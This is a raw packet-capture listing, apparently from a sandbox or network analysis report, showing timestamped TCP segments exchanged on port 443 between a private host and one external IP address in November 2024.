                                                                                                                Nov 15, 2024 18:14:13.073765993 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.073785067 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.074456930 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.074525118 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.074548006 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.074668884 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.074737072 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.074748993 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.075474024 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.075536966 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.075548887 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.075658083 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.075737953 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.075752020 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.076442003 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.076503992 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.076519966 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.077271938 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.077331066 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.077348948 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.077532053 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.077595949 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.077609062 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.078314066 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.078401089 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.078416109 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.078560114 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.078629017 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.078638077 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.079257965 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.079329014 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.079350948 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.080053091 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.080123901 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.080142021 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.080311060 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.080369949 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.080384970 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.080881119 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.080941916 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.080956936 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.081098080 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.081151962 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.081166983 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.081763983 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.081835985 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.081856012 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.081932068 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.081988096 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.082005978 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.082169056 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.082225084 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.082238913 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.082824945 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.082889080 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.082901001 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.083041906 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.083116055 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.083131075 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.083738089 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.083801031 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.083807945 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.083820105 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.083875895 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.083885908 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.083930969 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.084634066 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.084698915 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.084714890 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.085100889 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.085159063 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.085167885 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.085184097 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.085222960 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.086226940 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.086287975 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.086337090 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.086358070 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.086385012 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.087099075 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.087157011 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.087167025 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.087197065 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.087218046 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.087876081 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.087939024 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.087954998 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.088221073 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.088285923 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.088300943 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.088391066 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.088426113 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.088462114 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.088475943 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.088502884 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.089389086 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.089430094 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.089474916 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.089489937 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.089504957 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.090286016 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.090328932 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.090369940 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.090385914 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.090405941 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.091006994 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.091078997 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.091093063 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.091288090 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.091356039 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.091367006 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.091402054 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.091454029 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.091463089 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.092137098 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.092205048 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.092220068 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.144867897 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.188661098 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.188817024 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.188896894 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.188966036 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.189050913 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.189090014 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.189418077 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.189502001 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.189527988 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.189860106 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.189939022 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.189964056 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.190371037 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.190448999 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.190478086 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.190805912 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.190896034 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.190926075 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.190987110 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.191056013 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.191081047 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.191592932 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.191674948 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.191708088 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.191802025 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.191869974 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.191889048 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.192569017 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.192648888 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.192675114 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.192778111 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.192857027 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.192881107 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.192991018 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.193064928 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.193094015 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.193595886 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.193664074 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.193677902 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.193804026 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.193867922 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.193882942 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.194602013 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.194675922 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.194695950 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.194837093 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.194905996 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.194916964 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.195544004 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.195622921 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.195640087 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.195723057 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.195780993 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.195797920 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.196167946 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.196374893 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.196383953 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.196396112 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.196464062 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.196479082 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.196527958 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.196577072 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.196649075 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.196660995 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.197175026 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.197248936 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.197268009 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.197401047 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.197463989 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.197475910 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.197630882 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.197802067 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.197819948 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.198108912 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.198172092 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.198188066 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.198292017 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.198353052 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.198365927 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.198885918 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.198961020 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.198975086 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.199090004 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.199151039 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.199163914 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.199229002 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.199292898 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.199306011 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.199774981 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.199841022 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.199856043 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.199984074 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.200047970 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.200059891 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.200525999 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.200591087 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.200604916 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.200721979 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.200783014 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.200797081 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.200910091 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.200969934 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.200982094 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.201565027 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.201636076 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.201656103 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.201716900 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.201775074 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.201791048 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.201899052 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.201961040 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.201976061 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.202442884 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.202508926 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.202521086 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.202949047 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203012943 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.203027964 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203057051 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203126907 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.203140020 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203241110 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203304052 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.203329086 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203643084 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203704119 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.203713894 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203882933 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203937054 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203946114 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.203955889 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.203996897 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.204617023 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.204667091 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.204680920 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.204694986 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.204719067 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.232947111 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.233109951 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.233141899 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.276798010 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.307311058 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.307619095 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.307655096 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.307861090 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.307948112 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.307959080 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.307975054 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.308060884 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.308068991 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.308531046 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.308609009 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.308623075 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.308784962 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.308856010 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.308872938 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.309175968 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.309262991 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.309277058 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.309626102 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.309696913 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.309699059 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.309710979 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.309772968 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.309787989 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.309843063 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.310030937 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.310108900 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.310121059 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.310306072 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.310369968 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.310383081 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.311005116 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.311048031 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.311085939 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.311099052 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.311127901 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.311502934 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.311573982 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.311588049 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.311928034 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.312001944 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.312016010 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.312174082 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.312238932 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.312252998 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.312329054 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.312395096 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.312407017 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.313085079 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.313159943 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.313173056 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.313280106 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.313327074 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.313354015 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.313368082 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.313394070 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.314192057 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.314263105 CET49731443192.168.2.4142.215.209.78
                                                                                                                Nov 15, 2024 18:14:13.314275026 CET44349731142.215.209.78192.168.2.4
                                                                                                                Nov 15, 2024 18:14:13.314347982 CET44349731142.215.209.78192.168.2.4
